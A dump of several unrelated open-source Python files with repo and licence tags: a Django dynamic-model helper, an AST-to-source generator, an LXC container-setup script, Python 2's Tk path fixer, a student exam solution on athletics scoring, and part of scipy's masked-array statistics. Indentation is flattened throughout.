# so dynamic models need to bypass django.core.management.syncdb.
# On the plus side, this allows individual models to be installed
# without installing the entire project structure.
# On the other hand, this means that things like relationships and
# indexes will have to be handled manually.
# This installs only the basic table definition.
with connection.schema_editor() as schema_editor:
schema_editor.create_model(model)
def to_form(model, fields=None):
class Meta:
pass
Meta.model = model
Meta.fields = '__all__'
attrs = {'Meta': Meta}
if fields:
attrs.update(fields)
form = type('modelform', (forms.ModelForm,), attrs)
return form
| agpl-3.0 |
RayMick/SFrame | oss_src/unity/python/sframe/meta/asttools/visitors/pysourcegen.py | 15 | 23969 | '''
Created on Jul 15, 2011
@author: sean
'''
from __future__ import print_function
import _ast
from ...asttools import Visitor
from string import Formatter
import sys
from ...utils import py3op, py2op
if sys.version_info.major < 3:
from StringIO import StringIO
else:
from io import StringIO
class ASTFormatter(Formatter):
def format_field(self, value, format_spec):
if format_spec == 'node':
gen = ExprSourceGen()
gen.visit(value)
return gen.dumps()
elif value == '':
return value
else:
return super(ASTFormatter, self).format_field(value, format_spec)
def get_value(self, key, args, kwargs):
if key == '':
return args[0]
elif key in kwargs:
return kwargs[key]
elif isinstance(key, int):
return args[key]
key = int(key)
return args[key]
raise Exception
def str_node(node):
gen = ExprSourceGen()
gen.visit(node)
return gen.dumps()
def simple_string(value):
def visitNode(self, node):
self.print(value, **node.__dict__)
return visitNode
class ExprSourceGen(Visitor):
def __init__(self):
self.out = StringIO()
self.formatter = ASTFormatter()
self.indent = ' '
self.level = 0
@property
def indenter(self):
return Indenter(self)
@property
def no_indent(self):
return NoIndent(self)
def dump(self, file=sys.stdout):
self.out.seek(0)
print(self.out.read(), file=file)
def dumps(self):
self.out.seek(0)
value = self.out.read()
return value
def print(self, line, *args, **kwargs):
line = self.formatter.format(line, *args, **kwargs)
level = kwargs.get('level')
prx = self.indent * (level if level else self.level)
print(prx, line, sep='', end='', file=self.out)
def print_lines(self, lines,):
prx = self.indent * self.level
for line in lines:
print(prx, line, sep='', file=self.out)
def visitName(self, node):
self.print(node.id)
@py2op
def visitarguments(self, node):
# ('args', 'vararg', 'kwarg', 'defaults')
defaults = [None] * (len(node.args) - len(node.defaults))
defaults.extend(node.defaults)
i = 0
args = list(node.args)
if args:
i += 1
arg = args.pop(0)
default = defaults.pop(0)
self.visit(arg)
if default is not None:
self.print('={:node}', default)
while args:
arg = args.pop(0)
default = defaults.pop(0)
self.print(', ')
self.visit(arg)
if default is not None:
self.print('={:node}', default)
if node.vararg:
self.print('{0}*{1}', ', ' if i else '', node.vararg)
if node.kwarg:
self.print('{0}**{1}', ', ' if i else '', node.kwarg)
@visitarguments.py3op
def visitarguments(self, node):
# ('args', 'vararg', 'kwarg', 'defaults')
defaults = [None] * (len(node.args) - len(node.defaults))
defaults.extend(node.defaults)
i = 0
args = list(node.args)
if args:
i += 1
arg = args.pop(0)
default = defaults.pop(0)
self.visit(arg)
if default is not None:
self.print('={:node}', default)
while args:
arg = args.pop(0)
default = defaults.pop(0)
self.print(', ')
self.visit(arg)
if default is not None:
self.print('={:node}', default)
if node.vararg:
self.print('{0}*{1}', ', ' if i else '', node.vararg)
if node.varargannotation:
self.print(':{:node}', node.varargannotation)
elif node.kwonlyargs:
self.print('{0}*', ', ' if i else '')
kwonlyargs = list(node.kwonlyargs)
if kwonlyargs:
i += 1
kw_defaults = [None] * (len(kwonlyargs) - len(node.kw_defaults))
kw_defaults.extend(node.kw_defaults)
while kwonlyargs:
kw_arg = kwonlyargs.pop(0)
kw_default = kw_defaults.pop(0)
self.print(', ')
self.visit(kw_arg)
if kw_default is not None:
self.print('={:node}', kw_default)
if node.kwarg:
self.print('{0}**{1}', ', ' if i else '', node.kwarg)
if node.varargannotation:
self.print(':{:node}', node.kwargannotation)
def visitNum(self, node):
self.print(repr(node.n))
def visitBinOp(self, node):
self.print('({left:node} {op:node} {right:node})', left=node.left, op=node.op, right=node.right)
def visitAdd(self, node):
self.print('+')
def visitalias(self, node):
if node.asname is None:
self.print("{0}", node.name)
else:
self.print("{0} as {1}", node.name, node.asname)
def visitCall(self, node):
self.print('{func:node}(' , func=node.func)
i = 0
print_comma = lambda i: self.print(", ") if i > 0 else None
with self.no_indent:
for arg in node.args:
print_comma(i)
self.print('{:node}', arg)
i += 1
for kw in node.keywords:
print_comma(i)
self.print('{:node}', kw)
i += 1
if node.starargs:
print_comma(i)
self.print('*{:node}', node.starargs)
i += 1
if node.kwargs:
print_comma(i)
self.print('**{:node}', node.kwargs)
i += 1
self.print(')')
def visitkeyword(self, node):
self.print("{0}={1:node}", node.arg, node.value)
def visitStr(self, node):
self.print(repr(node.s))
def visitMod(self, node):
self.print('%')
def visitTuple(self, node, brace='()'):
self.print(brace[0])
print_comma = lambda i: self.print(", ") if i > 0 else None
i = 0
with self.no_indent:
for elt in node.elts:
print_comma(i)
self.print('{:node}', elt)
i += 1
if len(node.elts) == 1:
self.print(',')
self.print(brace[1])
def visitCompare(self, node):
self.print('({0:node} ', node.left)
with self.no_indent:
for (op, right) in zip(node.ops, node.comparators):
self.print('{0:node} {1:node}' , op, right)
self.print(')')
@py2op
def visitRaise(self, node):
self.print('raise ')
with self.no_indent:
if node.type:
self.print('{:node}' , node.type)
if node.inst:
self.print(', {:node}' , node.inst)
if node.tback:
self.print(', {:node}' , node.tback)
@visitRaise.py3op
def visitRaise(self, node):
self.print('raise ')
with self.no_indent:
if node.exc:
self.print('{:node}' , node.exc)
if node.cause:
self.print(' from {:node}' , node.cause)
def visitAttribute(self, node):
self.print('{:node}.{attr}', node.value, attr=node.attr)
def visitDict(self, node):
self.print('{{')
items = zip(node.keys, node.values)
with self.no_indent:
i = 0
pc = lambda : self.print(", ") if i > 0 else None
for key, value in items:
pc()
self.print('{0:node}:{1:node}', key, value)
i += 1
self.print('}}')
def visitSet(self, node):
self.print('{{')
items = node.elts
with self.no_indent:
i = 0
pc = lambda : self.print(", ") if i > 0 else None
for value in items:
pc()
self.print('{0:node}', value)
i += 1
self.print('}}')
def visitList(self, node):
self.print('[')
with self.no_indent:
i = 0
pc = lambda : self.print(", ") if i > 0 else None
for item in node.elts:
pc()
self.print('{:node}', item)
i += 1
self.print(']')
def visitSubscript(self, node):
self.print('{0:node}[{1:node}]', node.value, node.slice)
def visitIndex(self, node):
if isinstance(node.value, _ast.Tuple):
with self.no_indent:
self.visit(node.value, brace=['', ''])
else:
self.print('{:node}', node.value)
def visitSlice(self, node):
with self.no_indent:
if node.lower is not None:
self.print('{:node}', node.lower)
self.print(':')
if node.upper is not None:
self.print('{:node}', node.upper)
if node.step is not None:
self.print(':')
self.print('{:node}', node.step)
def visitExtSlice(self, node):
dims = list(node.dims)
with self.no_indent:
dim = dims.pop(0)
self.print('{0:node}', dim)
while dims:
dim = dims.pop(0)
self.print(', {0:node}', dim)
def visitUnaryOp(self, node):
self.print('({0:node}{1:node})', node.op, node.operand)
def visitAssert(self, node):
self.print('assert {0:node}', node.test)
if node.msg:
with self.no_indent:
self.print(', {0:node}', node.msg)
visitUSub = simple_string('-')
visitUAdd = simple_string('+')
visitNot = simple_string('not ')
visitInvert = simple_string('~')
visitAnd = simple_string('and')
visitOr = simple_string('or')
visitSub = simple_string('-')
visitFloorDiv = simple_string('//')
visitDiv = simple_string('/')
visitMod = simple_string('%')
visitMult = simple_string('*')
visitPow = simple_string('**')
visitEq = simple_string('==')
visitNotEq = simple_string('!=')
visitLt = simple_string('<')
visitGt = simple_string('>')
visitLtE = simple_string('<=')
visitGtE = simple_string('>=')
visitLShift = simple_string('<<')
visitRShift = simple_string('>>')
visitIn = simple_string('in')
visitNotIn = simple_string('not in')
visitIs = simple_string('is')
visitIsNot = simple_string('is not')
visitBitAnd = simple_string('&')
visitBitOr = simple_string('|')
visitBitXor = simple_string('^')
visitEllipsis = simple_string('...')
visitYield = simple_string('yield {value:node}')
def visitBoolOp(self, node):
with self.no_indent:
values = list(node.values)
left = values.pop(0)
self.print('({:node} ', left)
while values:
left = values.pop(0)
self.print('{0:node} {1:node})', node.op, left)
def visitIfExp(self, node):
self.print('{body:node} if {test:node} else {orelse:node}', **node.__dict__)
def visitLambda(self, node):
self.print('lambda {0:node}: {1:node}', node.args, node.body)
def visitListComp(self, node):
self.print('[{0:node}', node.elt)
generators = list(node.generators)
with self.no_indent:
while generators:
generator = generators.pop(0)
self.print('{0:node}', generator)
self.print(']')
def visitSetComp(self, node):
self.print('{{{0:node}', node.elt)
generators = list(node.generators)
with self.no_indent:
while generators:
generator = generators.pop(0)
self.print('{0:node}', generator)
self.print('}}')
def visitDictComp(self, node):
self.print('{{{0:node}:{1:node}', node.key, node.value)
generators = list(node.generators)
with self.no_indent:
while generators:
generator = generators.pop(0)
self.print('{0:node}', generator)
self.print('}}')
def visitcomprehension(self, node):
self.print(' for {0:node} in {1:node}', node.target, node.iter)
ifs = list(node.ifs)
while ifs:
if_ = ifs.pop(0)
self.print(" if {0:node}", if_)
@py3op
def visitarg(self, node):
self.print(node.arg)
if node.annotation:
with self.no_indent:
self.print(':{0:node}', node.annotation)
def visit_expr(node):
gen = ExprSourceGen()
gen.visit(node)
return gen.dumps()
class NoIndent(object):
def __init__(self, gen):
self.gen = gen
def __enter__(self):
self.level = self.gen.level
self.gen.level = 0
def __exit__(self, *args):
self.gen.level = self.level
class Indenter(object):
def __init__(self, gen):
self.gen = gen
def __enter__(self):
self.gen.print('\n', level=0)
self.gen.level += 1
def __exit__(self, *args):
self.gen.level -= 1
class SourceGen(ExprSourceGen):
def __init__(self, header=''):
super(SourceGen, self).__init__()
print(header, file=self.out)
def visitModule(self, node):
children = list(self.children(node))
if children and isinstance(children[0], _ast.Expr):
if isinstance(children[0].value, _ast.Str):
doc = children.pop(0).value
self.print("'''")
self.print_lines(doc.s.split('\n'))
self.print_lines(["'''", '\n', '\n'])
for node in children:
self.visit(node)
def visitFor(self, node):
self.print('for {0:node} in {1:node}:', node.target, node.iter)
with self.indenter:
for stmnt in node.body:
self.visit(stmnt)
if node.orelse:
self.print('else:')
with self.indenter:
for stmnt in node.orelse:
self.visit(stmnt)
@py2op
def visitFunctionDef(self, node):
#fields = ('name', 'args', 'body', 'decorator_list')
for decorator in node.decorator_list:
self.print('@{decorator:node}\n', decorator=decorator)
args = visit_expr(node.args)
self.print('def {name}({args}):' , name=node.name, args=args)
with self.indenter:
for child in node.body:
self.visit(child)
return
@visitFunctionDef.py3op
def visitFunctionDef(self, node):
for decorator in node.decorator_list:
self.print('@{decorator:node}\n', decorator=decorator)
args = visit_expr(node.args)
self.print('def {name}({args})' , name=node.name, args=args)
with self.no_indent:
if node.returns:
self.print(' -> {:node}:', node.returns)
else:
self.print(':', node.returns)
with self.indenter:
for child in node.body:
self.visit(child)
return
def visitAssign(self, node):
targets = [visit_expr(target) for target in node.targets]
self.print('{targets} = {value:node}\n', targets=' = '.join(targets), value=node.value)
def visitAugAssign(self, node):
self.print('{target:node} {op:node}= {value:node}\n', **node.__dict__)
def visitIf(self, node, indent_first=True):
self.print('if {:node}:', node.test, level=self.level if indent_first else 0)
with self.indenter:
if node.body:
for expr in node.body:
self.visit(expr)
else:
self.print('pass')
if node.orelse and len(node.orelse) == 1 and isinstance(node.orelse[0], _ast.If):
self.print('el'); self.visit(node.orelse[0], indent_first=False)
elif node.orelse:
self.print('else:')
with self.indenter:
for expr in node.orelse:
self.visit(expr)
self.print('\n')
def visitImportFrom(self, node):
for name in node.names:
self.print("from {0} import {1:node}\n", node.module, name)
def visitImport(self, node):
for name in node.names:
self.print("import {:node}\n", name)
def visitPrint(self, node):
self.print("print ")
with self.no_indent:
if node.dest:
self.print(">> {:node}" , node.dest)
if not node.values and node.nl:
self.print("\n")
return
self.print(", ")
i = 0
pc = lambda : self.print(", ") if i > 0 else None
for value in node.values:
pc()
self.print("{:node}" , value)
if not node.nl:
self.print(",")
self.print("\n")
def visitExec(self, node):
self.print('exec {0:node} in {1}, {2}\n', node.body,
'None' if node.globals is None else str_node(node.globals),
'None' if node.locals is None else str_node(node.locals))
def visitWith(self, node):
self.print('with {0:node}', node.context_expr)
if node.optional_vars is not None:
self.print(' as {0:node}', node.optional_vars, level=0)
self.print(':', level=0)
with self.indenter:
if node.body:
for expr in node.body:
self.visit(expr)
else:
self.print('pass\n')
def visitGlobal(self, node):
self.print('global ')
with self.no_indent:
names = list(node.names)
if names:
name = names.pop(0)
self.print(name)
while names:
name = names.pop(0)
self.print(', {0}', name)
self.print('\n')
def visitDelete(self, node):
self.print('del ')
targets = list(node.targets)
with self.no_indent:
target = targets.pop(0)
self.print('{0:node}', target)
while targets:
target = targets.pop(0)
self.print(', {0:node}', target)
self.print('\n')
def visitWhile(self, node):
self.print('while {0:node}:', node.test)
with self.indenter:
if node.body:
for expr in node.body:
self.visit(expr)
else:
self.print("pass")
if node.orelse:
self.print('else:')
with self.indenter:
for expr in node.orelse:
self.visit(expr)
self.print('\n')
self.print('\n')
def visitExpr(self, node):
self.print('{:node}\n', node.value)
visitBreak = simple_string('break\n')
visitPass = simple_string('pass\n')
visitContinue = simple_string('continue\n')
def visitReturn(self, node):
if node.value is not None:
self.print('return {:node}\n', node.value)
def visitTryExcept(self, node):
self.print('try:')
with self.indenter:
if node.body:
for stmnt in node.body:
self.visit(stmnt)
else:
self.print('pass')
for hndlr in node.handlers:
self.visit(hndlr)
if node.orelse:
self.print('else:')
with self.indenter:
for stmnt in node.orelse:
self.visit(stmnt)
@py2op
def visitExceptHandler(self, node):
self.print('except')
with self.no_indent:
if node.type:
self.print(" {0:node}", node.type)
if node.name:
self.print(" as {0:node}", node.name)
self.print(":")
with self.indenter:
if node.body:
for stmnt in node.body:
self.visit(stmnt)
else:
self.print('pass')
@visitExceptHandler.py3op
def visitExceptHandler(self, node):
self.print('except')
with self.no_indent:
if node.type:
self.print(" {0:node}", node.type)
if node.name:
self.print(" as {0}", node.name)
self.print(":")
with self.indenter:
for stmnt in node.body:
self.visit(stmnt)
def visitTryFinally(self, node):
for item in node.body:
self.visit(item)
self.print('finally:')
with self.indenter:
for item in node.finalbody:
self.visit(item)
@py2op
def visitClassDef(self, node):
for decorator in node.decorator_list:
self.print('@{0:node}\n', decorator)
self.print('class {0}', node.name)
with self.no_indent:
self.print('(')
bases = list(node.bases)
if bases:
base = bases.pop(0)
self.print("{0:node}", base)
while bases:
base = bases.pop(0)
self.print(", {0:node}", base)
self.print(')')
self.print(":")
with self.indenter:
if node.body:
for stmnt in node.body:
self.visit(stmnt)
else:
self.print("pass\n\n")
@visitClassDef.py3op
def visitClassDef(self, node):
for decorator in node.decorator_list:
self.print('@{0:node}\n', decorator)
self.print('class {0}', node.name)
with self.no_indent:
self.print('(')
bases = list(node.bases)
i = 0
if bases:
i += 1
base = bases.pop(0)
self.print("{0:node}", base)
while bases:
base = bases.pop(0)
self.print(", {0:node}", base)
keywords = list(node.keywords)
if keywords:
if i: self.print(', ')
i += 1
keyword = keywords.pop(0)
self.print("{0:node}", keyword)
while keywords:
base = keywords.pop(0)
self.print(", {0:node}", keyword)
if node.starargs:
if i: self.print(', ')
i += 1
self.print("*{0:node}", node.starargs)
if node.kwargs:
if i: self.print(', ')
i += 1
self.print("*{0:node}", node.kwargs)
self.print(')')
self.print(":")
with self.indenter:
if node.body:
for stmnt in node.body:
self.visit(stmnt)
else:
self.print("pass\n\n")
def python_source(ast, file=sys.stdout):
'''
Generate executable python source code from an ast node.
:param ast: ast node
:param file: file to write output to.
'''
gen = SourceGen()
gen.visit(ast)
gen.dump(file)
def dump_python_source(ast):
'''
:return: a string containing executable python source code from an ast node.
:param ast: ast node
:param file: file to write output to.
'''
gen = SourceGen()
gen.visit(ast)
return gen.dumps()
| bsd-3-clause |
swiftstack/runway | make_base_container.py | 1 | 9600 | #!/usr/bin/env python3
#
#Copyright (c) 2016-2021, NVIDIA CORPORATION.
#SPDX-License-Identifier: Apache-2.0
import argparse
import os
import random
import requests
import sys
import tempfile
import uuid
from libs import colorprint
from libs.cli import run_command
SCRIPT_DIR = os.path.abspath(os.path.dirname(__file__))
# assume well-known lvm volume group on host
# ...later we'll figure out how to make this dynamic
VG_NAME = "swift-runway-vg01"
SWIFTSTACK_IMAGES_PREFIX = "ss-"
SWIFTSTACK_IMAGES_BASE_URL = "https://tellus.swiftstack.com/v1/AUTH_runway/lxd-images"
BACKUP_SWIFTSTACK_IMAGES_BASE_URL = (
"https://cloud.swiftstack.com/v1/AUTH_runway/lxd-images"
)
IMAGE_MANIFEST_OBJECT_NAME = "manifest.json"
UNIFIED_TARBALL_TYPE = "unified"
SPLIT_TARBALL_TYPE = "split"
TARBALL_TYPES = [UNIFIED_TARBALL_TYPE, SPLIT_TARBALL_TYPE]
def exit_with_error(error_text):
colorprint.error(error_text)
sys.exit(1)
def get_default_image(distro):
if distro.lower() == "rhel":
return "images:centos/7/amd64"
else:
return "ubuntu:16.04"
def is_swiftstack_hosted_image(base_image):
return base_image.lower().startswith(SWIFTSTACK_IMAGES_PREFIX)
def get_image_manifest(swift_container_name, use_backup_url=False):
if use_backup_url:
base_url = BACKUP_SWIFTSTACK_IMAGES_BASE_URL
else:
base_url = SWIFTSTACK_IMAGES_BASE_URL
manifest_obj_url = "{}/{}/{}".format(
base_url, swift_container_name, IMAGE_MANIFEST_OBJECT_NAME
)
try:
r = requests.get(manifest_obj_url)
r.raise_for_status()
return r.json()
except Exception as e:
if not use_backup_url:
print(
"Could not download container image manifest from its "
"primary location. Retrying with backup location..."
)
return get_image_manifest(swift_container_name, True)
else:
raise Exception(
"Could not download container image manifest from "
"'{}'.\n{}".format(manifest_obj_url, e)
)
def is_image_already_imported(fingerprint):
try:
run_command("lxc image info {} >/dev/null 2>&1".format(fingerprint), shell=True)
except Exception:
return False
return True
def delete_image_with_alias(alias):
try:
run_command("lxc image delete {}".format(alias))
except Exception:
pass
def download_unified_image_file(manifest, use_backup_url=False):
if use_backup_url:
base_url = BACKUP_SWIFTSTACK_IMAGES_BASE_URL
else:
base_url = SWIFTSTACK_IMAGES_BASE_URL
tarball_url = "{}/{}".format(base_url, manifest["tarball-object"])
try:
r = requests.get(tarball_url, stream=True)
r.raise_for_status()
with tempfile.NamedTemporaryFile(delete=False) as f:
file_path = f.name
for chunk in r.iter_content(chunk_size=1024):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
except Exception as e:
if not use_backup_url:
print(
"Could not download unified image from its primary "
"location. Retrying with backup location..."
)
return download_unified_image_file(manifest, True)
else:
raise Exception(
"Could not download file from '{}': {}".format(tarball_url, e)
)
return file_path
def import_unified_image(manifest, alias):
tarball_path = download_unified_image_file(manifest)
# There might be an older image with the same alias
delete_image_with_alias(alias)
run_command("lxc image import {} --alias {}".format(tarball_path, alias))
os.unlink(tarball_path)
def download_split_image_files(manifest, use_backup_url=False):
if use_backup_url:
base_url = BACKUP_SWIFTSTACK_IMAGES_BASE_URL
else:
base_url = SWIFTSTACK_IMAGES_BASE_URL
metadata_tarball_url = "{}/{}".format(base_url, manifest["metadata-object"])
rootfs_tarball_url = "{}/{}".format(base_url, manifest["rootfs-object"])
file_paths = []
for url in [metadata_tarball_url, rootfs_tarball_url]:
try:
r = requests.get(url, stream=True)
r.raise_for_status()
with tempfile.NamedTemporaryFile(delete=False) as f:
file_paths.append(f.name)
for chunk in r.iter_content(chunk_size=1024):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
except Exception as e:
if not use_backup_url:
print(
"Could not download split image from its primary "
"location. Retrying with backup location..."
)
return download_split_image_files(manifest, True)
else:
raise Exception(
"Could not download file from '{}': {}".format(url, e)
)
return tuple(file_paths)
def import_split_image(manifest, alias):
metadata_tarball_path, rootfs_tarball_path = download_split_image_files(manifest)
# There might be an older image with the same alias
delete_image_with_alias(alias)
run_command(
"lxc image import {} {} --alias {}".format(
metadata_tarball_path, rootfs_tarball_path, alias
)
)
os.unlink(metadata_tarball_path)
os.unlink(rootfs_tarball_path)
def import_image(manifest, alias):
"""
There are 2 possible image formats: unified and split. We support both.
For unified format, the manifest will look like this:
{
"tarball_type": "unified",
"fingerprint": "629d2c18b7bb0b52b80dfe62ae309937123d05b563ef057233e7802c9e18c018",
"tarball-object": "centos7.5/629d2c18b7bb0b52b80dfe62ae309937123d05b563ef057233e7802c9e18c018.tar.gz"
}
For split format, the manifest will look like this:
{
"tarball_type": "split",
"fingerprint": "22abbefe0c68943f264a7139c7a699a0b2adfbcf46fc661d2e89b1232301a5de",
"metadata-object": "centos7.5/meta-22abbefe0c68943f264a7139c7a699a0b2adfbcf46fc661d2e89b1232301a5de.tar.xz",
"rootfs-object": "centos7.5/22abbefe0c68943f264a7139c7a699a0b2adfbcf46fc661d2e89b1232301a5de.squashfs"
}
"""
if manifest["tarball_type"] not in TARBALL_TYPES:
raise Exception("Invalid tarball type: {}".format(manifest["tarball_type"]))
elif manifest["tarball_type"] == UNIFIED_TARBALL_TYPE:
import_unified_image(manifest, alias)
elif manifest["tarball_type"] == SPLIT_TARBALL_TYPE:
import_split_image(manifest, alias)
else:
raise Exception(
"Tarball type '{}' is valid, but a method to import "
"it has not been implemented yet."
)
def import_image_if_needed(base_image):
if not is_swiftstack_hosted_image(base_image):
raise Exception("{} is not an image hosted by SwiftStack".format(base_image))
swift_container_name = base_image[len(SWIFTSTACK_IMAGES_PREFIX) :]
manifest = get_image_manifest(swift_container_name)
if not is_image_already_imported(manifest["fingerprint"]):
print("Importing image '{}'...".format(base_image))
import_image(manifest, base_image)
else:
print("Image '{}' is already imported".format(base_image))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("distro", type=str, help="Container distro")
parser.add_argument("cname", metavar="containername", help="Container name")
parser.add_argument("volsize", help="Volume size")
parser.add_argument("volcount", type=int, help="Volume count")
parser.add_argument(
"baseimage",
nargs="?",
help="Base image. Defaults: 'images:centos/7/amd64' "
"for RHEL distro, 'ubuntu:16.04' otherwise",
)
args = parser.parse_args()
distro = args.distro
container_name = args.cname
base_image = args.baseimage
volume_size = args.volsize
volume_count = args.volcount
if is_swiftstack_hosted_image(distro):
import_image_if_needed(distro)
default_image = distro
else:
default_image = get_default_image(distro)
if base_image is None:
base_image = default_image
try:
# make a container profile that maps 8 block devices to the guest
rand_file_name = str(uuid.UUID(int=random.getrandbits(128)))
run_command(
"./make_lxc_profile.py {} {} {} {} > "
"/tmp/{}".format(
container_name, VG_NAME, volume_size, volume_count, rand_file_name
),
cwd=SCRIPT_DIR,
shell=True,
)
run_command("lxc profile create {}-profile".format(container_name))
run_command(
"cat /tmp/{} | lxc profile edit {}-profile".format(
rand_file_name, container_name
),
cwd=SCRIPT_DIR,
shell=True,
)
# launch the new container
print("Trying to launch container from base image {}".format(base_image))
run_command(
"lxc launch {} {} -p {}-profile || "
"lxc launch {} {} -p {}-profile".format(
base_image,
container_name,
container_name,
default_image,
container_name,
container_name,
),
shell=True,
)
except Exception as e:
exit_with_error(str(e))
| apache-2.0 |
michalliu/OpenWrt-Firefly-Libraries | staging_dir/host/lib/python2.7/lib-tk/FixTk.py | 26 | 2942 | import sys, os
# Delay import _tkinter until we have set TCL_LIBRARY,
# so that Tcl_FindExecutable has a chance to locate its
# encoding directory.
# Unfortunately, we cannot know the TCL_LIBRARY directory
# if we don't know the tcl version, which we cannot find out
# without import Tcl. Fortunately, Tcl will itself look in
# <TCL_LIBRARY>\..\tcl<TCL_VERSION>, so anything close to
# the real Tcl library will do.
# Expand symbolic links on Vista
try:
import ctypes
ctypes.windll.kernel32.GetFinalPathNameByHandleW
except (ImportError, AttributeError):
def convert_path(s):
return s
else:
def convert_path(s):
assert isinstance(s, str) # sys.prefix contains only bytes
udir = s.decode("mbcs")
hdir = ctypes.windll.kernel32.\
CreateFileW(udir, 0x80, # FILE_READ_ATTRIBUTES
1, # FILE_SHARE_READ
None, 3, # OPEN_EXISTING
0x02000000, # FILE_FLAG_BACKUP_SEMANTICS
None)
if hdir == -1:
# Cannot open directory, give up
return s
buf = ctypes.create_unicode_buffer(u"", 32768)
res = ctypes.windll.kernel32.\
GetFinalPathNameByHandleW(hdir, buf, len(buf),
0) # VOLUME_NAME_DOS
ctypes.windll.kernel32.CloseHandle(hdir)
if res == 0:
# Conversion failed (e.g. network location)
return s
s = buf[:res].encode("mbcs")
# Ignore leading \\?\
if s.startswith("\\\\?\\"):
s = s[4:]
if s.startswith("UNC"):
s = "\\" + s[3:]
return s
prefix = os.path.join(sys.prefix,"tcl")
if not os.path.exists(prefix):
# devdir/externals/tcltk/lib
prefix = os.path.join(sys.prefix, "externals", "tcltk", "lib")
prefix = os.path.abspath(prefix)
# if this does not exist, no further search is needed
if os.path.exists(prefix):
prefix = convert_path(prefix)
if "TCL_LIBRARY" not in os.environ:
for name in os.listdir(prefix):
if name.startswith("tcl"):
tcldir = os.path.join(prefix,name)
if os.path.isdir(tcldir):
os.environ["TCL_LIBRARY"] = tcldir
# Compute TK_LIBRARY, knowing that it has the same version
# as Tcl
import _tkinter
ver = str(_tkinter.TCL_VERSION)
if "TK_LIBRARY" not in os.environ:
v = os.path.join(prefix, 'tk'+ver)
if os.path.exists(os.path.join(v, "tclIndex")):
os.environ['TK_LIBRARY'] = v
# We don't know the Tix version, so we must search the entire
# directory
if "TIX_LIBRARY" not in os.environ:
for name in os.listdir(prefix):
if name.startswith("tix"):
tixdir = os.path.join(prefix,name)
if os.path.isdir(tixdir):
os.environ["TIX_LIBRARY"] = tixdir
| gpl-2.0 |
csaldias/python-usm | Certámenes resueltos/Certamen 2 2014-1 (CSSJ y CSV)/pregunta3.py | 1 | 2707 | #Datos del problema.
competencia = {
'pista': {'v100mt','v400mt','v800mt','v3000mt','d100mt','d400mt'},
'campo': {'vbala','vdisco','vlargo','dbala'}
}
puntaje = {
'lugar 1': 12, #Medalla
'lugar 2': 9, #Medalla
'lugar 3': 7, #Medalla
'lugar 4': 5,
'lugar 5': 4,
'lugar 6': 3,
'lugar 7': 2,
'lugar 8': 1
}
resultado = {
'usm' : [('mrios','v400mt',9), ('nmassu','v3000mt',12), ('jrojas','vdisco',12)],
'usach': [('jramos','d400mt',5), ('lsoto','d400mt',9), ('mruiz','v800mt',7)],
'uc' : [('mhard','v100mt',3), ('msolis','d3000mt',5), ('lrozas','dbala',5)]
}
#Pregunta a)
def participante_prueba(competencia, resultado, prueba):
nombres = []
#Iteramos sobre los resultados
for lista_por_u in resultado.values():
#Vamos desempaquetando...
for nombre_competidor, prueba_competidor, ptje in lista_por_u:
#Si la prueba del competidor esta dentro del grupo de pruebas solicitado...
if prueba_competidor in competencia[prueba]:
#Guardamos su nombre
nombres.append(nombre_competidor)
return nombres
#Pregunta b)
def mayor_cantidad(resultado, puntaje):
#Algunas variables auxiliares
mayor_medallas = -1
mayor_u = ""
#Iteramos sobre las llaves y valores de resultado
for universidad, competidores in resultado.items():
#Var auxiliar
cant_medallas = 0
#Iteramos sobre la lista de competidores
for nombre_competidor, prueba_competidor, ptje in competidores:
#Si el competidor obtuvo alguna medalla...
if ptje == puntaje['lugar 1'] or ptje == puntaje['lugar 2'] or ptje == puntaje['lugar 3']:
#Aumentamos la cuenta
cant_medallas += 1
#Si la cuenta de medallas es mayor que la maxima...
if cant_medallas >= mayor_medallas:
#Actualizamos valores
mayor_medallas = cant_medallas
mayor_u = universidad
return mayor_u
#Pregunta c)
def prueba_sin_medallas(resultado, puntaje):
pruebas_no_medalla = []
#Iteramos sobre los valores de resultado
for lista_por_u in resultado.values():
#Desempaquetamos
for nombre_competidor, prueba_competidor, ptje in lista_por_u:
#Si la prueba no tiene medalla...
if not (ptje == puntaje['lugar 1'] or ptje == puntaje['lugar 2'] or ptje == puntaje['lugar 3']):
#La agregamos.
pruebas_no_medalla.append(prueba_competidor)
#Debemos filtrar los "colados", las pruebas que se agregan a la lista teniendo una medalla
elif (ptje == puntaje['lugar 1'] or ptje == puntaje['lugar 2'] or ptje == puntaje['lugar 3']) and prueba_competidor in pruebas_no_medalla:
pruebas_no_medalla.remove(prueba_competidor)
return pruebas_no_medalla
#Prueba
print participante_prueba(competencia, resultado, 'campo')
print mayor_cantidad(resultado, puntaje)
print prueba_sin_medallas(resultado, puntaje) | mit |
kleskjr/scipy | scipy/stats/mstats_extras.py | 40 | 14219 | """
Additional statistics functions with support for masked arrays.
"""
# Original author (2007): Pierre GF Gerard-Marchant
from __future__ import division, print_function, absolute_import
__all__ = ['compare_medians_ms',
'hdquantiles', 'hdmedian', 'hdquantiles_sd',
'idealfourths',
'median_cihs','mjci','mquantiles_cimj',
'rsh',
'trimmed_mean_ci',]
import numpy as np
from numpy import float_, int_, ndarray
import numpy.ma as ma
from numpy.ma import MaskedArray
from . import mstats_basic as mstats
from scipy.stats.distributions import norm, beta, t, binom
def hdquantiles(data, prob=list([.25,.5,.75]), axis=None, var=False,):
"""
Computes quantile estimates with the Harrell-Davis method.
The quantile estimates are calculated as a weighted linear combination
of order statistics.
Parameters
----------
data : array_like
Data array.
prob : sequence, optional
Sequence of quantiles to compute.
axis : int or None, optional
Axis along which to compute the quantiles. If None, use a flattened
array.
var : bool, optional
Whether to return the variance of the estimate.
Returns
-------
hdquantiles : MaskedArray
A (p,) array of quantiles (if `var` is False), or a (2,p) array of
quantiles and variances (if `var` is True), where ``p`` is the
number of quantiles.
"""
def _hd_1D(data,prob,var):
"Computes the HD quantiles for a 1D array. Returns nan for invalid data."
xsorted = np.squeeze(np.sort(data.compressed().view(ndarray)))
# Don't use length here, in case we have a numpy scalar
n = xsorted.size
hd = np.empty((2,len(prob)), float_)
if n < 2:
hd.flat = np.nan
if var:
return hd
return hd[0]
v = np.arange(n+1) / float(n)
betacdf = beta.cdf
for (i,p) in enumerate(prob):
_w = betacdf(v, (n+1)*p, (n+1)*(1-p))
w = _w[1:] - _w[:-1]
hd_mean = np.dot(w, xsorted)
hd[0,i] = hd_mean
#
